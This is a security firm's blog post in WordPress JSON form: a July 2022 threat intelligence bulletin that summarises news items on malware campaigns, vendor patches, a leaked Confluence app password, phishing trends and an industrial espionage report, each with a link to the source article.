{"id":104,"date":"2022-07-28T20:52:15","date_gmt":"2022-07-28T20:52:15","guid":{"rendered":"https:\/\/gcsecurity.us\/?p=104"},"modified":"2023-01-27T19:58:06","modified_gmt":"2023-01-27T19:58:06","slug":"security-bulletin-container-files-bots-and-industrial-espionage","status":"publish","type":"post","link":"https:\/\/gcsecurity.us\/?p=104","title":{"rendered":"Threat Intelligence Bulletin &#8211; Container Files, Bots, and Industrial Espionage"},"content":{"rendered":"\n<p>In response to Microsoft plans to block macros by default, threat actors changing TTPs to container files (ISO, RAR) and Windows shortcut files (LNK)<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html\">https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html<\/a><\/li><li><a href=\"https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement\">https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Cisco releases patches for vulnerabilities affecting Nexus Dashboard for data centers<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html\">https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Overview of new Linux malware \u201cLightning Framework\u201d, contains breadth of features and modularity<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html\">https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Info-stealing malware Amadey being installed through backdoor disguised as cracked software, can bypass Sophos and Windows Defender<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/cyware.com\/news\/amadey-bots-new-version-spreads-using-software-cracks-11f2a0ac\">https:\/\/cyware.com\/news\/amadey-bots-new-version-spreads-using-software-cracks-11f2a0ac<\/a><\/li><li><a href=\"https:\/\/www.darkreading.com\/attacks-breaches\/supercharged-version-amadey-infostealer-malware-dropper-bypass-av\">https:\/\/www.darkreading.com\/attacks-breaches\/supercharged-version-amadey-infostealer-malware-dropper-bypass-av<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Threat actors increasingly using Internet Information Services (IIS) extensions to backdoor servers and establish persistence<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/malicious-iis-extensions-gaining.html\">https:\/\/thehackernews.com\/2022\/07\/malicious-iis-extensions-gaining.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Hardcoded Atlassian Questions for Confluence app password leaked, likely to lead to exploit attempts<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/vulnerabilities-threats\/critical-bugs-atlassian-confluence-workspaces-open\">https:\/\/www.darkreading.com\/vulnerabilities-threats\/critical-bugs-atlassian-confluence-workspaces-open<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Researchers detail how Telegram and Discord, along with their associated bots, cloud infrastructure, and CDNs are being used for attacks<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/application-security\/discord-telegram-hijacked-cyberattacks\">https:\/\/www.darkreading.com\/application-security\/discord-telegram-hijacked-cyberattacks<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Microsoft takes top spot as most impersonated brand in phishing attacks<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/attacks-breaches\/microsoft-tops-brands-phishers-prefer\">https:\/\/www.darkreading.com\/attacks-breaches\/microsoft-tops-brands-phishers-prefer<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Overview, IOCs, and whitepaper of an industrial espionage attack<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bitdefender.com\/blog\/labs\/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation\/\">https:\/\/www.bitdefender.com\/blog\/labs\/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation\/<\/a><\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In response to Microsoft plans to block macros by default, threat actors changing TTPs to container files (ISO, RAR) and Windows shortcut files (LNK) https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement Cisco releases patches for vulnerabilities affecting Nexus Dashboard for data centers https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html Overview of new Linux malware \u201cLightning Framework\u201d, contains breadth of features and modularity https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html Info-stealing malware Amadey [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[15,14],"class_list":["post-104","post","type-post","status-publish","format-standard","hentry","category-news","tag-cybersecurity","tag-news"],"_links":{"self":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=104"}],"version-history":[{"count":2,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104\/revisions"}],"predecessor-version":[{"id":108,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104\/revisions\/108"}],"wp:attachment":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}